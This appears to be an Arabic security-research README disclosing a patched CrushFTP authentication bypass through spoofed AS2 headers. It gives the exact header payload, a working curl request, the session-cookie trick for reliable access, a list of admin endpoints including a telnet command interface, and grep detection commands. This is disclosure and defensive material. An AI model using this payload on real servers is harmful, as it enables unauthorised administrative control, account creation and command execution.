
النتائج وسباق يوليو مع 0day في البرية
⚠️ هام: تم إصلاح هذه الثغرة بواسطة CrushFTP اعتبارًا من نوفمبر 2025. يُنشر هذا البحث لأغراض تعليمية ودفاعية فقط.
📝 ملاحظة: يعتمد هذا البحث على أنماط ثغرات مشابهة لـ CVE-2025-54309. قد يختلف رقم CVE الدقيق. هذا بحث أمني مستقل أُجري في بيئة مختبر منزلي محكومة.
يوثق هذا المستودع ثغرة حرجة في تجاوز المصادقة في خوادم CrushFTP تتيح الوصول الإداري الكامل من خلال التلاعب برؤوس AS2 (بيان التطبيق 2). لا تتطلب الثغرة أي مصادقة ويمكن استغلالها بطلب HTTP واحد.
النقاط الرئيسية:
الباحث: SmileyFace101 (@SmileyFace101)
تثق واجهة CrushFTP الويب برؤوس بروتوكول AS2 بشكل غير صحيح دون التحقق المناسب. يفترض الخادم أن طلبات AS2 قد تمت مصادقتها مسبقًا ويتجاوز إجراءات المصادقة العادية.
إصدارات CrushFTP المعرضة للخطر (مؤكدة في المختبر):
الإصدارات المصححة:
بيئة المختبر:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
مثال (بيئة المختبر):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
ملاحظة: استخدم فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
أثناء الاستغلال، اكتشفنا علاقة رياضية في توليد ملفات تعريف الارتباط للجلسة تجعل الاستغلال موثوقًا بنسبة 100٪:
CrushAuth Structure: [TIMESTAMP]_[SESSION_ID]
currentAuth = آخر 4 أحرف من SESSION_ID
c2f parameter = نفس قيمة currentAuth
✅ تعداد كامل للخادم والمستخدمين
✅ إنشاء وتعديل حسابات المستخدمين
✅ الوصول إلى نظام الملفات وتصفحه
✅ تنفيذ الأوامر عبر واجهة telnet
✅ جدولة المهام بامتيازات النظام
✅ الوصول إلى مفاتيح PGP والشهادات
✅ تعديل التكوين الإداري
انظر دليل detection/ لـ:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/ مع رؤوس AS2# سجلات خادم الويب
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# سجلات تطبيق CrushFTP
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # هذا الملف - نظرة عامة واستخدام
├── docs/
│ └── TECHNICAL_ANALYSIS.md # غوص تقني كامل
├── exploits/
│ ├── enhanced_session_exploit.sh # استغلال كامل مع إدارة الجلسة
│ ├── targeted_exploitation.sh # اختبار نقاط النهاية عالية القيمة
│ └── adaptive_exploitation.sh # نهج متعدد الاستراتيجيات
└── detection/
├── snort_rules.txt # تواقيع IDS/IPS (Snort)
├── suricata_rules.txt # تواقيع IDS/IPS (Suricata)
└── log_analysis.sh # تحليل السجلات وكشف مؤشرات الاختراق
اقرأ الوثائق:
اختبر في مختبرك:
# تأكد من أنك تملك النظام المستهدف!
./exploits/enhanced_session_exploit.sh 10.0.100.50
نشر الكشف:
✅ اكتشاف وتوثيق تجاوز مصادقة AS2 بالكامل
✅ تحديد وحل متطلب توليد ملفات تعريف الارتباط الحرج للجلسة
✅ هندسة عكسية للعلاقة الرياضية في إدارة الجلسة
✅ تطوير منهجية استغلال على مرحلتين
✅ إنشاء نمط استغلال موثوق بنسبة 100%
✅ تحديد وتحليل متجهات RCE متعددة
✅ إجراء تحليل كامل لشفرة مصدر JavaScript
/WebInterface/admin/index.html - لوحة الإدارة الرئيسية/WebInterface/admin/telnet.html - واجهة Telnet/WebInterface/Jobs/index.html - إدارة المهام/WebInterface/UserManager/index.html - إدارة المستخدمين/WebInterface/PGP/index.html - إدارة مفاتيح PGP/WebInterface/function/ - معالج الوظائف الإداريةالمؤلف: SmileyFace101
GitHub: @SmileyFace101
فترة البحث: مارس - يوليو 2025 (مختبر منزلي)
الإفصاح العام: 6 ديسمبر 2025
هذا البحث لأغراض تعليمية ودفاعية فقط.
✅ الاستخدام المصرح به:
❌ المحظور:
باستخدام هذا البحث، فإنك توافق على:
إخلاء المسؤولية: المؤلف غير مسؤول عن سوء الاستخدام. الوصول غير المصرح به إلى الكمبيوتر غير قانوني.
رخصة MIT - انظر ملف LICENSE للتفاصيل.
آخر تحديث: 6 ديسمبر 2025
تقييم المخاطر: حرج - يتطلب التصحيح والتخفيف الفوري
آخر تحديث: 6 ديسمبر 2025
المؤلف: SmileyFace101
تم إجراء البحث: مارس - يوليو 2025 في بيئة مختبر مرخصة
| Security Aspect | Impact Level | Description |
|---|
| السرية | 🔴 حرج | وصول كامل إلى بيانات الاعتماد، الإعدادات، مفاتيح PGP، السجلات |
| النزاهة | 🔴 حرج | إنشاء حسابات المستخدمين، تغيير الإعدادات، تعديل الملفات |
| التوفر | 🟡 عالي | تنفيذ أوامر النظام، القدرة على تعطيل الخدمة |
| تصعيد الامتيازات | 🔴 حرج | وصول إداري مباشر، إنشاء حسابات دائمة |